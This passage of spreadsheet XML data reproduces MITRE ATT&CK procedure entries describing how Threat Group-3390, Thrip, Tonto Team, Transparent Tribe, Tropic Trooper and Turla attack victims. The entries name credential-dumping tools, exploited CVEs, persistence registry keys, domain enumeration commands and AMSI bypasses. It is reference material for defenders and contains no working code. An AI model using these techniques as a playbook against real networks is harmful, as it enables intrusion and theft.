    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has obtained and used tools such as [Impacket](https://attack.mitre.org/software/S0357), [pwdump](https://attack.mitre.org/software/S0006), [Mimikatz](https://attack.mitre.org/software/S0002), [gsecdump](https://attack.mitre.org/software/S0008), [NBTscan](https://attack.mitre.org/software/S0590), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: Unit42 Emissary Panda May 2019)(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has compromised third party service providers to gain access to victim's environments.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has hosted malicious payloads on Dropbox.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has staged tools, including [gsecdump](https://attack.mitre.org/software/S0008) and WCE, on previously compromised websites.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) malware has used HTTP for C2.(Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used a variety of Web shells.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used command-line interfaces for execution.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can use WMI to execute a binary.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used WinRM to enable remote execution.(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can create a new service, naming it after the config information, to gain persistence.(Citation: Nccgroup Emissary Panda May 2018)</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) has used WinSCP to exfiltrate data from a targeted organization over FTP.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) used a cloud-based remote access software called LogMeIn for their attacks.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) abuses a legitimate and signed Microsoft executable to launch a malicious DLL.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.(Citation: Kaspersky CactusPete Aug 2020)(Citation: TrendMicro Tonto Team October 2020)(Citation: Talos Bisonal Mar 2020)(Citation: Talos Bisonal 10 Years March 2020) </t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has exploited CVE-2019-0803 and MS16-032 to escalate privileges.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used EternalBlue exploits for lateral movement.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has routed their traffic through an external server in order to obfuscate their location.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has downloaded malicious DLLs which served as a [ShadowPad](https://attack.mitre.org/software/S0596) loader.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used keylogging tools in their operations.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used the &lt;code&gt;ShowLocalGroupDetails&lt;/code&gt; command to identify administrator, user, and guest accounts on a compromised host.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has relied on user interaction to open their malicious RTF documents.(Citation: TrendMicro Tonto Team October 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used tools such as [NBTscan](https://attack.mitre.org/software/S0590) to enumerate network shares.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has used a variety of credential dumping tools.(Citation: TrendMicro Tonto Team October 2020) </t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used PowerShell to download additional payloads.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tonto Team](https://attack.mitre.org/groups/G0131) has used Python-based tools for execution.(Citation: TrendMicro Tonto Team October 2020) </t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has delivered payloads via spearphishing attachments.(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>[Tonto Team](https://attack.mitre.org/groups/G0131) has used a first stage web shell after compromising a vulnerable Exchange server.(Citation: ESET Exchange Mar 2021)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has registered domains to mimic file sharing, government, defense, and research websites for use in targeted campaigns.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has compromised domains for use in targeted malicious campaigns.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used websites with malicious hyperlinks and iframes to infect targeted victims with [Crimson](https://attack.mitre.org/software/S0115), [njRAT](https://attack.mitre.org/software/S0385), and other malicious tools.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Unit 42 ProjectM March 2016)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has set up websites with malicious hyperlinks and iframes to infect targeted victims with [Crimson](https://attack.mitre.org/software/S0115), [njRAT](https://attack.mitre.org/software/S0385), and other malicious tools.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Unit 42 ProjectM March 2016)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used dynamic DNS services to set up C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) can hide legitimate directories and replace them with malicious copies of the same name.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used weaponized documents in e-mail to compromise targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)(Citation: Unit 42 ProjectM March 2016)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has directed users to open URLs hosting malicious content.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) can mimic legitimate Windows directories by using the same icons and names.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has dropped encoded executables on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Transparent Tribe](https://attack.mitre.org/groups/G0134) has sent spearphishing e-mails with attachments to deliver malicious payloads.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)(Citation: Unit 42 ProjectM March 2016)	 </t>
  </si>
  <si>
    <t>[Transparent Tribe](https://attack.mitre.org/groups/G0134) has embedded links to malicious downloads in e-mails.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Transparent Tribe](https://attack.mitre.org/groups/G0134) has crafted VBS-based malicious documents.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)	 </t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has collected information automatically using the adversary's [USBferry](https://attack.mitre.org/software/S0452) attack.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: Anomali Pirate Panda April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor has communicated to the C2 over the DNS protocol.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used shellcode with an XOR algorithm to decrypt a payload. [Tropic Trooper](https://attack.mitre.org/groups/G0081) also decrypted image files which contained a payload.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into dllhost.exe and svchost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted traffic with the C2 to prevent network detection.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has exfiltrated data using USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has deleted dropper files on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has monitored files' modified time.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under &lt;code&gt;C:\ProgramData\Apple\Updates\&lt;/code&gt; and &lt;code&gt;C:\Users\Public\Documents\Flash\&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used known administrator account credentials to execute the backdoor directly.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has lured victims into executing malware via malicious e-mail attachments.(Citation: Anomali Pirate Panda April 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has hidden payloads in Flash directories and fake installer files.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;pr&lt;/code&gt; and an openly available tool to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;netview&lt;/code&gt; to scan target systems for shared resources.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) is capable of enumerating the running processes on the system using &lt;code&gt;pslist&lt;/code&gt;.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created shortcuts in the Startup folder to establish persistence.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has attempted to transfer [USBferry](https://attack.mitre.org/software/S0452) from an infected USB device by copying an Autorun function to the target machine.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) can search for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor could list the infected system's installed software.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro TropicTrooper 2015)(Citation: CitizenLab Tropic Trooper Aug 2018)(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used base64 encoding to hide command strings delivered from the C2.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system’s OS version and system volume information.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used scripts to collect the host's network topology.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has tested if the localhost network is available and other connection capability on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;letmein&lt;/code&gt; to scan for saved usernames on the target system.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has started a web service in the target host and wait for the adversary to connect, acting as a web shell.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used Windows command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has installed a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; and sets the value to establish persistence.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has encrypted files stolen from connected USB drives into a RAR file before exfiltration.(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>A [Turla](https://attack.mitre.org/groups/G0010) JavaScript backdoor has used Google Apps Script as its C2 server.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) may attempt to connect to systems within a victim's network using &lt;code&gt;net use&lt;/code&gt; commands and a predefined list or collection of passwords.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has modified variables in kernel memory to turn off Driver Signature Enforcement after exploiting vulnerabilities that obtained kernel mode privileges.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can impersonate or steal process tokens before executing commands.(Citation: ESET Turla PowerShell May 2019)	</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used a custom .NET tool to collect documents from an organization's internal central database.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can upload files from victim machines.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can collect files from USB thumb drives.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or [PowerShell Profile](https://attack.mitre.org/techniques/T1546/013), to decode encrypted PowerShell payloads.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net user /domain&lt;/code&gt; to enumerate domain accounts.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net group "Domain Admins" /domain&lt;/code&gt; to identify domain administrators.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has infected victims using watering holes.(Citation: ESET ComRAT May 2020)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used Metasploit to perform reflective DLL injection in order to escalate privileges.(Citation: ESET Turla Mosquito May 2018)(Citation: Github Rapid7 Meterpreter Elevate)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also exfiltrated stolen files to OneDrive and 4shared.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.(Citation: Unit42 AcidBox June 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the &lt;code&gt;lPH*.dll&lt;/code&gt; pattern.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover Group Policy details using the &lt;code&gt;gpresult&lt;/code&gt; command.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>Based on comparison of [Gazer](https://attack.mitre.org/software/S0168) versions, [Turla](https://attack.mitre.org/groups/G0010) made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used shellcode to download Meterpreter after compromising a victim.(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has compromised internal network systems to act as a proxy to forward traffic to C2.(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;tracert&lt;/code&gt; to check internet connectivity.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) has used various JavaScript-based backdoors.(Citation: ESET Turla Mosquito Jan 2018)	</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can be used to transfer files to/from victim machines on the local network.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net user&lt;/code&gt; to enumerate local accounts on the system.(Citation: ESET ComRAT May 2020)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has abused local accounts that have the same password across the victim’s network.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net localgroup&lt;/code&gt; and &lt;code&gt;net localgroup Administrators&lt;/code&gt; to enumerate group information, including members of the local administrators group.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used multiple backdoors which communicate with a C2 server via email attachments.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used spearphishing via a link to get users to download and run their malware.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has developed its own unique malware for use in operations.(Citation: Recorded Future Turla Infra 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used malware obtained after compromising other threat actors, such as [OilRig](https://attack.mitre.org/groups/G0049).(Citation: NSA NCSC Turla OilRig)(Citation: Recorded Future Turla Infra 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used the Registry to store encrypted payloads.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used encryption (including salted 3DES via [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Out-EncryptedScript.ps1&lt;/code&gt;), random variable names, and base64 encoding to obfuscate PowerShell commands and payloads.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; to acquire password policy information.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;fsutil fsinfo drives&lt;/code&gt; to list connected drives.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from [Empire](https://attack.mitre.org/software/S0363)'s PSInject.(Citation: ESET Turla Mosquito May 2018)(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also used PowerShell scripts to load and execute malware in memory.</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used PowerShell profiles to maintain persistence on an infected machine.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running processes using the &lt;code&gt;tasklist /v&lt;/code&gt; command.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated processes associated with specific open ports or named pipes.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has also used [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-ReflectivePEInjection.ps1&lt;/code&gt; to reflectively load a PowerShell payload into a random process on the victim system.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have included local UPnP RPC proxies.(Citation: ESET Turla PowerShell May 2019)	</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used IronPython scripts as part of the [IronNetInjector](https://attack.mitre.org/software/S0581) toolchain to drop payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover information in the Windows Registry with the &lt;code&gt;reg query&lt;/code&gt; command.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>A [Turla](https://attack.mitre.org/groups/G0010) Javascript backdoor added a local_update_check value under the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence. Additionally, a [Turla](https://attack.mitre.org/groups/G0010) custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the &lt;code&gt;net view&lt;/code&gt; and &lt;code&gt;net view /DOMAIN&lt;/code&gt; commands. [Turla](https://attack.mitre.org/groups/G0010) has also used &lt;code&gt;net group "Domain Computers" /domain&lt;/code&gt;, &lt;code&gt;net group "Domain Controllers" /domain&lt;/code&gt;, and &lt;code&gt;net group "Exchange Servers" /domain&lt;/code&gt; to enumerate domain computers, including the organization's DC and Exchange Server.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) used &lt;code&gt;net use&lt;/code&gt; commands to connect to lateral systems within a network.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has obtained information on security software, including security logging information that may indicate whether their malware has been detected.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
